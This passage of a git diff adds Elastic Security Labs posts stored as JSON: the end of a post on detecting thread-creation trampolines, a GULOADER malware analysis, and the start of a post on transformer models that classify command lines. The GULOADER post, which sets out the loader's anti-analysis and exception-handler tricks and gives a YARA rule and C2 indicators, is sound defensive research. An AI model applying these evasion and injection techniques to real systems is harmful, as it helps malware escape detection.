This implementation of the C standard library works as an API layer that sits above Win32– and it includes thread creation APIs.\n\nThese APIs perform some extra CRT bookkeeping on thread creation/destruction by passing an internal CRT thread entrypoint to CreateThread() and by passing the user entrypoint to subsequently call as part of the structure pointed to by the CreateThread() parameter.\n\nSo, in this case, the Win32StartAddress observed will be the non-exported msvcrt!\\_startthread(ex). The shellcode address will be at a specific offset from the thread parameter during thread creation (Microsoft CRT source is available), and the shellcode will be the next frame on the call stack after the CRT.\n\nNote: without additional tricks this can only be used to create in-process threads and there is no CreateRemoteThread() equivalent. Those tricks exist, however, and you should not expect this module as a start address in remote threads.\n\nUnfortunately, there is no operating system bookkeeping that will tell you if a thread was created remotely after the fact. Consequently, we can’t scan for this with our script– but the inline callbacks used by security products can make this distinction.\n\nCurrently, the script simply traverses the stack bottom-up and infers the first handful of frames by looking at candidate return addresses. This code could definitely be improved via disassembly or using unwind information, which are less rewarding to implement in PowerShell. The current approach is reliable enough for demonstration purposes:\n\n\n\n\n\nThe updated script detects the original suspicious thread in addition to the four classes of bypass described in this research.\n\n## Hunting suspicious thread creations\n\nIn addition to detections for the four known major classes of thread start address trampolines, the updated script also includes some additional heuristics. Some of these have medium false positive rates and are hidden behind an -Aggressive flag. 
However, they may still be useful in hunting scenarios.\n\nFunctions have structure- except when they don’t. There is no decompiler in PowerShell as far as we know – so we approximated with a byte pattern regular expression instead. Identifying code that doesn’t follow convention is useful, but unconventional code could easily be produced by a compiler that we haven’t tested against.\n\nInterestingly, we had to account for the “MZ” magic bytes that correspond to a [DOS Executable](https://en.wikipedia.org/wiki/DOS_MZ_executable) being a purportedly valid thread entrypoint. The Windows loader [ignores](https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/corexemain-function) the value of the AddressOfEntryPoint field in the PE header for Common Language Runtime (CLR) executables such as .NET.\n\nInstead, execution always starts in MsCorEE!\\_CorExeMain() in the CLR Runtime which determines the actual process entrypoint from the CLR metadata. This makes sense as a CLR assembly might only contain bytecode which needs to be JIT’d by the runtime before being called. However, the value of this field is still passed to CreateThread() and it is often zero- which results in the unexpected MZ entrypoint bytes.\n\n\n\nThe second heuristic examines the bytes immediately preceding the user entrypoint. This is usually a return, a jump, or a filler byte. Common filler bytes are zero, nop, and int 3. However, this is only a convention.\n\nIn particular, older compilers would regularly place data side by side with code- presumably to achieve performance through data locality. For example, we previously analysed the x64 binaries on Microsoft’s symbol server and noticed that this mixing of code and data was normal in Visual Studio 2012, was mostly remediated in VS2013, and appears to have been finally fixed in VS2015 Update 2.\n\n\n\nThe third heuristic is yet another compiler convention. 
As mentioned earlier, compilers like to output functions that maximize the instruction cache performance of CPUs, which typically use 16-byte fetches. But compilers appear to also like to save space– so they typically only ensure that the first basic block fits within the smallest number of 16-byte lines as opposed to strict 16-byte alignment. In other words, if a basic block is 20 bytes then it’ll always need at least two fetches, but we want to ensure that it doesn’t need three.\n\n\n\nMany common Win32 modules have no valid thread entrypoints at all– so check for these.\n\nThis list is definitely non-exhaustive.\n\nKernel32.dll is a special case. LoadLibrary is not technically a valid thread entrypoint– but CreateRemoteThread(kernel32!LoadLibraryA, “signed.dll”) is actually how most security products would prefer software to do code injection into running processes when necessary. That is, the injected code is signed and loaded into read-only image-backed memory. To the best of our knowledge, this approach was first proposed by Jeffrey Richter in an article in the May 1994 edition of the Microsoft Systems Journal and later included in his [Advanced Windows](https://openlibrary.org/books/OL1120758M/Advanced_Windows) book. So treat LoadLibrary as suspicious- but not necessarily malicious.\n\nntdll.dll is loaded everywhere so it is often the first choice for a gadget or hook. There are only four valid ntdll entrypoints that we know of and the script explicitly checks for these.\n\nTwo of these functions aren’t exported, and rather than using P/Invoke to download the public symbols and find the offset in the PDB, the script dynamically queries its own threads for their start addresses to find these. 
PowerShell already uses worker threads, and the script starts a private ETW logger session to force a thread with the final address.\n\nSide-loaded DLLs remain a highly popular technique- and are still predominantly unsigned.\n\n\n\nThis one isn’t a thread start heuristic- but it was too simple not to include. Legitimate threads might impersonate SYSTEM briefly, but (lazy) malware authors (or operators) tend to escalate privileges initially and hold them indefinitely.\n\n## Wrapping up\n\nAs flagged last time, nothing in security is a silver bullet. You should not expect 100% detection from suspicious thread creations alone.\n\nFor example, an adversary could modify their tools to simply not create any new threads, restricting their execution to hijacked threads only. The distinction is perhaps subtle, but Get-InjectedThreadEx only attempts to detect anomalous thread creation addresses – not the broader case of legitimate threads that were subsequently hijacked. This is why, in addition to imposing costs at thread creation, [Elastic Security](https://www.elastic.co/endpoint-security/) employs other defensive layers including [memory signatures](https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures), [behavioral detections](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo) and [defense evasion detections](https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack).\n\nWhile it is somewhat easy to hijack a single thread after creation, ensuring that all your malware’s threads, including any third-party payloads, use the right version of the right detection bypass for the installed security products is a maintenance cost for the adversary, and mistakes will be made.\n\nLet’s keep raising the bar. We’d love to hear about thread creation bypasses- and scalable detection approaches. We’re stronger together.\n"
+ },
+ "title": "Get-InjectedThreadEx – Detecting Thread Creation Trampolines",
+ "slug": "get-injectedthreadex-detection-thread-creation-trampolines",
+ "date": "2022-12-07",
+ "description": "In this blog, we will demonstrate how to detect each of four classes of process trampolining and release an updated PowerShell detection script – Get-InjectedThreadEx",
+ "author": [
+ {
+ "slug": "john-uhlmann"
+ }
+ ],
+ "image": "photo-edited-02-e.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "windows internals",
+ "process injection",
+ "defense evasion"
+ ]
+ },
+ "id": "security_labs_content-get_injectedthreadex_detection_thread_creation_trampolines-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_gooey_with_guloader_downloader-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_gooey_with_guloader_downloader-md.json
new file mode 100644
index 00000000000..63fca07698c
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_gooey_with_guloader_downloader-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Getting gooey with GULOADER: deobfuscating the downloader\"\nslug: \"getting-gooey-with-guloader-downloader\"\ndate: \"2023-12-06\"\ndescription: \"Elastic Security Labs walks through the updated GULOADER analysis countermeasures.\"\nauthor:\n - slug: daniel-stepanic\nimage: \"photo-edited-03@2x.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - guloader\n - cloudeye\n - Vectored Exception handler\n---\n\n## Overview\n\nElastic Security Labs continues to monitor active threats such as GULOADER, also known as [CloudEyE](https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye) – an evasive shellcode downloader that has been highly active for years while under constant development. One of these recent changes is the addition of exceptions to its Vectored Exception Handler (VEH) in a fresh campaign, adding more complexity to its already long list of anti-analysis tricks. \n \nWhile GULOADER’s core functionality hasn’t changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GULOADER a time-consuming and resource-intensive process. In this post, we will touch on the following topics when triaging GULOADER:\n\n* Reviewing the initial shellcode and unpacking process\n* Finding the entrypoint of the decrypted shellcode\n* Discuss update to GULOADER’s VEH that obfuscates control flow\n* Provide a methodology to patch out VEH\n\n## Initial Shellcode\n\nIn our [sample](https://www.virustotal.com/gui/file/6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99), GULOADER comes pre-packaged inside an NSIS (Nullsoft Scriptable Install System) installer. When the installer is extracted, the main components are: \n\n* **NSIS Script** - This script file outlines all the various configuration and installation aspects.\n\n\n\n\n* **System.dll** - Located under the `$PLUGINSDir`. 
This file is dropped in a temporary folder to allocate/execute the GULOADER shellcode.\n\n\n\n\n* **Shellcode** - The encrypted shellcode is buried in a nested folder.\n\nOne quick way to pinpoint the file hosting the shellcode is to monitor `ReadFile` events from Sysinternals’ Process Monitor after executing GULOADER. In this case, we can see that the shellcode is read in from a file (`Fibroms.Hag`).\n\n\n\n\nGULOADER executes shellcode through callbacks using different Windows API functions. The main reasoning behind this is to avoid detections centered around traditional Windows APIs used for process injection, such as `CreateRemoteThread` or `WriteProcessMemory`. We have observed `EnumResourceTypesA` and `CallWindowProcW` used by GULOADER.\n\n\n\n\nBy reviewing the MSDN documentation for [`EnumResourceTypesA`](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa), we can see the second parameter expects a pointer to the callback function. From the screenshot above, we can see that the newly allocated shellcode is placed into this argument.\n\n\n\n\n\n\n\n## Finding Main Shellcode Entrypoint\n\nIn recent samples, GULOADER has increased the complexity at the start of the initial shellcode by including many different junk instructions and jumps. Reverse engineering of the downloader can require a long process of unwinding code obfuscation designed to break disassembly and control flow in some tooling, making it frustrating to find the actual start of the core GULOADER shellcode.\n\nOne way to find the initial call is to use graph view inside x64dbg with a bottom-to-top approach, looking for the `call eax` instruction. 
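As a rough complement to the graph-view approach described above, a raw byte scan can flag candidate `call eax` sites before opening a disassembler. This is a hedged sketch (the function name is illustrative, not from the post); byte scanning can hit false positives when `FF D0` appears inside another instruction's operands, which is why the post favors x64dbg and Miasm for confirmation:

```python
def find_call_eax(shellcode: bytes) -> list[int]:
    """Return offsets of the 2-byte `call eax` encoding (0xFF 0xD0).

    Results are only candidates: the byte pair may occur inside other
    instructions' operands, so confirm each hit in a disassembler.
    """
    return [i for i in range(len(shellcode) - 1)
            if shellcode[i] == 0xFF and shellcode[i + 1] == 0xD0]
```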
\n\n\n\n\nAnother technique to trace the initial control flow involves leveraging the reverse engineering framework [Miasm](https://github.com/cea-sec/miasm). Below is a quick example where we can pass in the shellcode and disassemble the instructions to follow the flow: \n\n```\nfrom miasm.core.locationdb import LocationDB\nfrom miasm.analysis.binary import Container\nfrom miasm.analysis.machine import Machine\n\nwith open(\"proctoring_06BF0000.bin\", \"rb\") as f:\n code = f.read()\n\nloc_db = LocationDB()\nc = Container.from_string(code, loc_db)\n\nmachine = Machine('x86_32')\nmdis = machine.dis_engine(c.bin_stream, loc_db=loc_db)\nmdis.follow_call = True \nmdis.dontdis_retcall = True\nasm_cfg = mdis.dis_multiblock(offset=0x1400)\n```\n\nMiasm cuts through the 142 `jmp` instructions and navigates through the junk instructions where we have configured it to stop on the call instruction to EAX (address: `0x3bde`). \n\n```\nJMP loc_3afd\n->\tc_to:loc_3afd \nloc_3afd\nMOV EBX, EAX\nFADDP ST(3), ST\nPANDN XMM7, XMM2\nJMP loc_3b3e\n->\tc_to:loc_3b3e \nloc_3b3e\nSHL CL, 0x0\nPSRAW MM1, MM0\nPSRLD XMM1, 0xF1\nJMP loc_3b97\n->\tc_to:loc_3b97 \nloc_3b97\nCMP DL, 0x3A\nPADDW XMM3, XMM5\nPXOR MM3, MM3\nJMP loc_3bde\n->\tc_to:loc_3bde \nloc_3bde\nCALL EAX\n```\n*Tail end of the Miasm output*\n\n## GULOADER’s VEH Update\n\nOne of GULOADER’s hallmark techniques is centered around its [Vectored Exception Handling](https://learn.microsoft.com/en-us/windows/win32/debug/vectored-exception-handling) (VEH) capability. This feature gives Windows applications the ability to intercept and handle exceptions before they are routed through the standard exception process. Malware families and software protection applications use this technique to make it challenging for analysts and tooling to follow the malicious code.\n\nGULOADER starts this process by adding the VEH using `RtlAddVectoredExceptionHandler`. 
Throughout the execution of the GULOADER shellcode, there is code purposely placed to trigger these different exceptions. When these exceptions are triggered, the VEH will check for hardware breakpoints. If none are found, GULOADER will modify the EIP directly through the [CONTEXT structure](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-context) using a one-byte XOR key (which changes per sample) and a one-byte offset derived from where the exception occurred. We will review a specific example of this technique in the subsequent section. Below is the decompilation of our sample’s VEH:\n\n\n\n\nAlthough this technique is not new, GULOADER continues to add new exceptions over time; we have recently observed these two exceptions added in the last few months:\n\n* `EXCEPTION_PRIV_INSTRUCTION`\n* `EXCEPTION_ILLEGAL_INSTRUCTION`\n\nAs new exceptions get added to GULOADER, they can end up breaking tooling used to expedite the analysis process for researchers. \n\n### EXCEPTION_PRIV_INSTRUCTION\n\nLet’s walk through the two recently added exceptions to follow the VEH workflow. The first exception (`EXCEPTION_PRIV_INSTRUCTION`) occurs when an attempt is made to execute a privileged instruction in a processor’s instruction set at a privilege level where it’s not allowed. Certain instructions, like the example below with [WRMSR](https://www.felixcloutier.com/x86/wrmsr), require kernel-level privileges, so when the program is run from user mode, it will trigger the exception due to insufficient permissions.\n\n\n\n\n\n### EXCEPTION_ILLEGAL_INSTRUCTION\n\nThis exception is invoked when a program attempts to execute an invalid or undefined CPU instruction. In our sample, running into Intel virtualization instructions such as `vmclear` or `vmxon` will trigger an exception. \n\n\n\n\nOnce an exception occurs, the GULOADER VEH code will first determine which exception code was responsible for the exception. 
In our sample, if the exception matches any of the five below, the code will take the same path regardless.\n\n* `EXCEPTION_ACCESS_VIOLATION` \n* `EXCEPTION_ILLEGAL_INSTRUCTION`\n* `EXCEPTION_PRIV_INSTRUCTION`\n* `EXCEPTION_SINGLE_STEP`\n* `EXCEPTION_BREAKPOINT`\n\nGULOADER will then check for any hardware breakpoints by walking the CONTEXT record found inside the **[EXCEPTION_POINTERS](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-exception_pointers)** structure. If hardware breakpoints are found in the different debug registers, GULOADER will write a `0` into the CONTEXT record, which will end up causing the shellcode to crash.\n\n\n\n\nIf there are no hardware breakpoints, GULOADER will retrieve a single byte located 7 bytes away from the address that caused the exception. Using the last example with `vmclear`, it would retrieve the byte `0x8A`.\n\n\n\n\nThen, using that byte, it will perform an XOR operation with a hard-coded byte (`0xB8` in our case) that is unique per sample. Now, with the derived offset `0x32` (`0xB8 ^ 0x8A`), GULOADER will modify the EIP address directly in the CONTEXT record by adding `0x32` to the address (`0x7697630`) that caused the exception, so execution resumes at address `0x7697662`.\n\n\n\n\nWith different junk instructions in between, and repeatedly hitting exceptions (we counted 229 unique exceptions in our sample), it’s not hard to see why this can break different tooling and increase analyst time.\n\n## Control Flow Cleaning\n\nTo make following the control flow easier, an analyst can bypass the VEH by tracing the execution, logging the exceptions, and patching the shellcode using the previously discussed EIP modification algorithm. 
For this procedure, we leveraged [TinyTracer](https://github.com/hasherezade/tiny_tracer), a tool written by [@hasherezade](https://twitter.com/hasherezade) that leverages [Pin](https://www.intel.com/content/www/us/en/developer/articles/tool/pin-a-dynamic-binary-instrumentation-tool.html), a dynamic binary instrumentation framework. This allows us to catch the different addresses that triggered exceptions; using the example above with `vmclear`, we can see that the address `0x7697630` generated an exception, invoking `KiUserExceptionDispatcher`, a function responsible for handling user-mode exceptions. \n\nOnce all the exceptions are collected and filtered, these can be passed into an IDAPython script where we walk through each address, calculate the offset using the byte located 7 bytes over and the XOR key (`0xB8`), then patch out all the instructions generating exceptions with short jumps. \n\nThe following image is an example of patching instructions that trigger exceptions at addresses `0x07697630` and `0x0769766C`. \n\n\n\n \nBelow is a graphic representing the control flow graph before the patching is applied globally. Our basic block with the `vmclear` instruction is highlighted in orange. By implementing the VEH, GULOADER flattens the control flow graph, making it harder to trace the program logic. \n\n\n\n\nPatching the VEH-triggering instructions with `jmp` instructions transforms the basic blocks by connecting them together, reducing the complexity behind the flow of the shellcode.\n\n\n\n\nUsing this technique can accelerate the cleaning process, yet it’s important to note that it isn’t a bulletproof method. In this instance, there still ends up being a good amount of code/functionality that will need to be analyzed, but this definitely goes a long way in simplifying the code by removing the VEH. 
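The offset recovery and short-jump patching described above can be sketched in Python. This is a hedged sketch, not the released POC script: the function names are illustrative, and the constants come from this sample (XOR key `0xB8`, marker byte 7 bytes past the faulting instruction):

```python
XOR_KEY = 0xB8  # per-sample one-byte key observed in this sample

def next_eip(shellcode: bytes, base: int, exc_addr: int) -> int:
    """Recompute where the VEH redirects execution after an exception."""
    marker = shellcode[exc_addr - base + 7]  # byte 7 bytes past the faulting instruction
    return exc_addr + (marker ^ XOR_KEY)     # one-byte XOR yields the jump distance

def short_jmp_patch(exc_addr: int, target: int) -> bytes:
    """2-byte short JMP that replaces the exception-raising instruction.

    The rel8 displacement is relative to the end of the 2-byte jump itself.
    """
    rel8 = (target - exc_addr - 2) & 0xFF
    return bytes([0xEB, rel8])
```

With the sample's values, the marker byte `0x8A` at `0x7697630 + 7` gives `0x8A ^ 0xB8 = 0x32`, so execution resumes at `0x7697662`, and the faulting instruction can be replaced with the short jump `EB 30`.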
The full POC script is located [here](https://github.com/elastic/labs-releases/tree/main/tools/guloader/guloader_FixCFG.py).\n\n## Conclusion\n\nGULOADER has many different features that can break disassembly, hinder control flow, and make analysis difficult for researchers. Although the process is imperfect, we can counter these traits through different static or dynamic techniques that help reduce the analysis time. For example, we observed that even with new exceptions in the VEH, we can still trace through them and patch the shellcode. This process will set the analyst on the right path, closer to accessing the core functionality of GULOADER. \n\nBy sharing some of our workflow, we hope to provide multiple takeaways if you encounter GULOADER in the wild. Based on GULOADER’s changes, it's highly likely that future behaviors will require new and different strategies. For detecting GULOADER, the following section includes YARA rules, and the IDAPython script from this post can be found [here](https://github.com/elastic/labs-releases/tree/main/tools/guloader/guloader_FixCFG.py). For new updates on the latest threat research, check out our [malware analysis section](https://www.elastic.co/security-labs/topics/malware-analysis) by the Elastic Security Labs team. 
\n\n```\nrule Windows_Trojan_Guloader {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-10-30\"\n last_modified = \"2023-11-02\" \n reference_sample = \"6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99\"\n severity = 100\n arch = \"x86\"\n threat_name = \"Windows.Trojan.Guloader\"\n license = \"Elastic License v2\"\n os = \"windows\"\n strings:\n $djb2_str_compare = { 83 C0 08 83 3C 04 00 0F 84 [4] 39 14 04 75 }\n $check_exception = { 8B 45 ?? 8B 00 38 EC 8B 58 ?? 84 FD 81 38 05 00 00 C0 }\n $parse_mem = { 18 00 10 00 00 83 C0 18 50 83 E8 04 81 00 00 10 00 00 50 }\n $hw_bp = { 39 48 0C 0F 85 [4] 39 48 10 0F 85 [4] 39 48 14 0F 85 [7] 39 48 18 }\n $scan_protection = { 39 ?? 14 8B [5] 0F 84 }\n condition:\n 2 of them\n}\n```\n\n## Observations\n \nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/guloader) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-----------|-------------------------|--------------------------|\n| 6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99 | SHA-256 | Windows.Trojan.Guloader | GULOADER downloader |\n| 101.99.75[.]183/MfoGYZkxZIl205.bin | url | NA | GULOADER C2 URL |\n| 101.99.75[.]183 | ipv4-addr | NA | GULOADER C2 IP |\n\n## References\n\n* [https://github.com/elastic/labs-releases/tree/main/tools/guloader](https://github.com/elastic/labs-releases/tree/main/tools/guloader) \n* [https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye](https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye)"
+ },
+ "title": "Getting gooey with GULOADER: deobfuscating the downloader",
+ "slug": "getting-gooey-with-guloader-downloader",
+ "date": "2023-12-06",
+ "description": "Elastic Security Labs walks through the updated GULOADER analysis countermeasures.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "photo-edited-03@2x.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "guloader",
+ "cloudeye",
+ "Vectored Exception handler"
+ ]
+ },
+ "id": "security_labs_content-getting_gooey_with_guloader_downloader-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_the_most_out_of_transforms_in_elastic-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_the_most_out_of_transforms_in_elastic-md.json
new file mode 100644
index 00000000000..1697773715e
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_the_most_out_of_transforms_in_elastic-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Getting the Most Out of Transformers in Elastic\"\nslug: \"getting-the-most-out-of-transforms-in-elastic\"\ndate: \"2022-08-23\"\ndescription: \"In this blog, we will briefly talk about how we fine-tuned a transformer model meant for a masked language modeling (MLM) task, to make it suitable for a classification task.\"\nauthor:\n - slug: apoorva-joshi\n - slug: thomas-veasey\n - slug: benjamin-trent\nimage: \"machine-learning-1200x628px-2021-notext.jpg\"\ncategory:\n - slug: security-research\ntags:\n - machine learning\n---\n\n## Preamble\n\nIn 8.3, our Elastic Stack Machine Learning team introduced a way to import [third party Natural Language Processing (NLP) models](https://www.elastic.co/guide/en/machine-learning/master/ml-nlp-model-ref.html) into Elastic. As security researchers, we HAD to try it out on a security dataset. So we decided to build a model to identify malicious command lines by fine-tuning a pre-existing model available on the [Hugging Face model hub](https://huggingface.co/models).\n\nUpon finding that the fine-tuned model was performing (surprisingly!) well, we wanted to see if it could replace or be combined with our previous [tree-based model](https://www.elastic.co/blog/problemchild-detecting-living-off-the-land-attacks) for detecting Living off the Land (LotL) attacks. But first, we had to make sure that the throughput and latency of this new model were reasonable enough for real-time inference. This resulted in a series of experiments, the results of which we will detail in this blog.\n\nIn this blog, we will briefly talk about how we fine-tuned a transformer model meant for a masked language modeling (MLM) task, to make it suitable for a classification task. We will also look at how to import custom models into Elastic. 
Finally, we’ll dive into all the experiments we did around using the fine-tuned model for real-time inference.\n\n## NLP for command line classification\n\nBefore you start building NLP models, it is important to understand whether an [NLP](https://www.ibm.com/cloud/learn/natural-language-processing) model is even suitable for the task at hand. In our case, we wanted to classify command lines as being malicious or benign. Command lines are a set of commands provided by a user via the computer terminal. An example command line is as follows:\n\n```\nmove test.txt C:\\\n```\n\nThe above command moves the file **test.txt** to the root of the `C:\\` directory.\n\nArguments in command lines are related, in that the co-occurrence of certain values can indicate malicious activity. NLP models are worth exploring here since these models are designed to understand and interpret relationships in natural (human) language, and since command lines often use some natural language.\n\n## Fine-tuning a Hugging Face model\n\nHugging Face is a data science platform that provides tools for machine learning (ML) enthusiasts to build, train, and deploy ML models using open source code and technologies. Its model hub has a wealth of models, trained for a variety of NLP tasks. You can either use these pre-trained models as-is to make predictions on your data, or fine-tune the models on datasets specific to your [NLP](https://www.ibm.com/cloud/learn/natural-language-processing) tasks.\n\nThe first step in fine-tuning is to instantiate a model with the model configuration and pre-trained weights of a specific model. Random weights are assigned to any task-specific layers that might not be present in the base model. Once initialized, the model can be trained to learn the weights of the task-specific layers, thus fine-tuning it for your task. 
Hugging Face has a method called [from_pretrained](https://huggingface.co/docs/transformers/v4.21.1/en/main_classes/model#transformers.PreTrainedModel.from_pretrained) that allows you to instantiate a model from a pre-trained model configuration.\n\nFor our command line classification model, we created a [RoBERTa](https://huggingface.co/docs/transformers/model_doc/roberta) model instance with encoder weights copied from the [roberta-base](https://huggingface.co/roberta-base) model, and a randomly initialized sequence classification head on top of the encoder:\n\n**model = RobertaForSequenceClassification.from_pretrained('roberta-base', num_labels=2)**\n\nHugging Face comes equipped with a [Tokenizers](https://huggingface.co/docs/transformers/v4.21.0/en/main_classes/tokenizer) library consisting of some of today's most used tokenizers. For our model, we used the [RobertaTokenizer](https://huggingface.co/docs/transformers/model_doc/roberta#transformers.RobertaTokenizer) which uses [Byte Pair Encoding](https://en.wikipedia.org/wiki/Byte_pair_encoding) (BPE) to create tokens. This tokenization scheme is well-suited for data belonging to a different domain (command lines) from that of the tokenization corpus (English text). A code snippet of how we tokenized our dataset using **RobertaTokenizer** can be found [here](https://gist.github.com/ajosh0504/4560af91adb48212402300677cb65d4a#file-tokenize-py). We then used Hugging Face's [Trainer](https://huggingface.co/docs/transformers/v4.21.0/en/main_classes/trainer#transformers.Trainer) API to train the model, a code snippet of which can be found [here](https://gist.github.com/ajosh0504/4560af91adb48212402300677cb65d4a#file-train-py).\n\nML models do not understand raw text. Before using text data as inputs to a model, it needs to be converted into numbers. 
Tokenizers group large pieces of text into smaller semantically useful units, such as (but not limited to) words, characters, or subwords, called tokens, which can, in turn, be converted into numbers using different encoding techniques.\n\n> - Check out [this](https://youtu.be/_BZearw7f0w) video (2:57 onwards) to review additional pre-processing steps that might be needed after tokenization based on your dataset.\n> - A complete tutorial on how to fine-tune pre-trained Hugging Face models can be found [here](https://huggingface.co/docs/transformers/training).\n\n## Importing custom models into Elastic\n\nOnce you have a trained model that you are happy with, it's time to import it into Elastic. This is done using [Eland](https://www.elastic.co/guide/en/elasticsearch/client/eland/current/machine-learning.html), a Python client and toolkit for machine learning in Elasticsearch. A code snippet of how we imported our model into Elastic using Eland can be found [here](https://gist.github.com/ajosh0504/4560af91adb48212402300677cb65d4a#file-import-py). \nYou can verify that the model has been imported successfully by navigating to **Model Management > Trained Models** via the Machine Learning UI in Kibana:\n\n\n\n## Using the Transformer model for inference — a series of experiments\n\nWe ran a series of experiments to evaluate whether or not our Transformer model could be used for real-time inference. For the experiments, we used a dataset consisting of ~66k command lines.\n\nOur first inference run with our fine-tuned **RoBERTa** model took ~4 hours on the test dataset. At the outset, this is much slower than the tree-based model that we were trying to beat, which took ~3 minutes for the entire dataset. 
It was clear that we needed to improve the throughput and latency of the PyTorch model to make it suitable for real-time inference, so we performed several experiments:\n\n### Using multiple nodes and threads\n\nThe latency numbers above were observed when the models were running on a single thread on a single node. If you have multiple Machine Learning (ML) nodes associated with your Elastic deployment, you can run inference on multiple nodes, and also on multiple threads on each node. This can significantly improve the throughput and latency of your models.\n\nYou can change these parameters while starting the trained model deployment via the [API](https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trained-model-deployment.html):\n\n```\nPOST _ml/trained_models/\\/deployment/_start?number_of_allocations=2&threads_per_allocation=4\n```\n\n**number_of_allocations** allows you to set the total number of allocations of a model across machine learning nodes and can be used to tune model throughput. **threads_per_allocation** allows you to set the number of threads used by each model allocation during inference and can be used to tune model latency. Refer to the [API documentation](https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trained-model-deployment.html) for best practices around setting these parameters.\n\nIn our case, we set **number_of_allocations** to **2**, as our cluster had two ML nodes, and **threads_per_allocation** to **4**, as each node had four allocated processors.\n\nRunning inference using these settings **resulted in a 2.7x speedup** on the original inference time.\n\n### Dynamic quantization\n\nQuantizing is one of the most effective ways of improving model compute cost, while also reducing model size. The idea here is to use a reduced precision integer representation for the weights and/or activations. 
While there are a number of ways to trade off model accuracy for increased throughput during model development, [dynamic quantization](https://pytorch.org/tutorials/intermediate/dynamic_quantization_bert_tutorial.html) helps achieve a similar trade-off after the fact, thus saving on time and resources spent on iterating over the model training.\n\nEland provides a way to dynamically quantize your model before importing it into Elastic. To do this, simply pass in `quantize=True` as an argument while creating the `TransformerModel` object (refer to the code snippet for importing models) as follows:\n\n```\n# Load the custom model\ntm = TransformerModel(\"model\", \"text_classification\", quantize=True)\n```\n\nIn the case of our command line classification model, we observed the model size drop from 499 MB to 242 MB upon dynamic quantization. Running inference on our test dataset using this model **resulted in a 1.6x speedup** on the original inference time, for a slight drop in model [**sensitivity**](https://en.wikipedia.org/wiki/Sensitivity_and_specificity) (exact numbers in the following section).\n\n### Knowledge Distillation\n\n[Knowledge Distillation](https://towardsdatascience.com/knowledge-distillation-simplified-dd4973dbc764) is a way to achieve model compression by transferring knowledge from a large (teacher) model to a smaller (student) one while maintaining validity. At a high level, this is done by using the outputs from the teacher model at every layer, to backpropagate error through the student model. This way, the student model learns to replicate the behavior of the teacher model. 
Model compression is achieved by reducing the number of parameters, which is directly related to the latency of the model.\n\nTo study the effect of knowledge distillation on the performance of our model, we fine-tuned a [distilroberta-base](https://huggingface.co/distilroberta-base) model (following the same procedure described in the fine-tuning section) for our command line classification task and imported it into Elastic. **distilroberta-base** has 82 million parameters, compared to its teacher model, **roberta-base** , which has 125 million parameters. The model size of the fine-tuned **DistilRoBERTa** model turned out to be **329** MB, down from **499** MB for the **RoBERTa** model.\n\nUpon running inference with this model, we **observed a 1.5x speedup** on the original inference time and slightly better model sensitivity (exact numbers in the following section) than the fine-tuned roberta-base model.\n\n### Dynamic quantization and knowledge distillation\n\nWe observed that dynamic quantization and model distillation both resulted in significant speedups on the original inference time. So, our final experiment involved running inference with a quantized version of the fine-tuned **DistilRoBERTa** model.\n\nWe found that this **resulted in a 2.6x speedup** on the original inference time, and slightly better model sensitivity (exact numbers in the following section). We also observed the model size drop from **329** MB to **199** MB after quantization.\n\n## Bringing it all together\n\nBased on our experiments, dynamic quantization and model distillation resulted in significant inference speedups. Combining these improvements with distributed and parallel computing, we were further able to **reduce the total inference time on our test set from four hours to 35 minutes**. 
However, even our fastest transformer model was still over an order of magnitude slower than the tree-based model, despite using significantly more CPU resources.\n\nThe Machine Learning team here at Elastic is introducing an inference caching mechanism in version 8.4 of the Elastic Stack, to save time spent on performing inference on repeat samples. These are a common occurrence in real-world environments, especially when it comes to Security. With this optimization in place, we are optimistic that we will be able to use transformer models alongside tree-based models in the future.\n\nA comparison of the sensitivity (true positive rate) and specificity (true negative rate) of our tree-based and transformer models shows that an ensemble of the two could potentially result in a more performant model:\n\n| Model | Sensitivity (%) | False Negative Rate (%) | Specificity (%) | False Positive Rate (%) |\n| ----------------------- | --------------- | ----------------------- | --------------- | ----------------------- |\n| Tree-based | 99.53 | 0.47 | 99.99 | 0.01 |\n| RoBERTa | 99.57 | 0.43 | 97.76 | 2.24 |\n| RoBERTa quantized | 99.56 | 0.44 | 97.64 | 2.36 |\n| DistilRoBERTa | 99.68 | 0.32 | 98.66 | 1.34 |\n| DistilRoBERTa quantized | 99.69 | 0.31 | 98.71 | 1.29 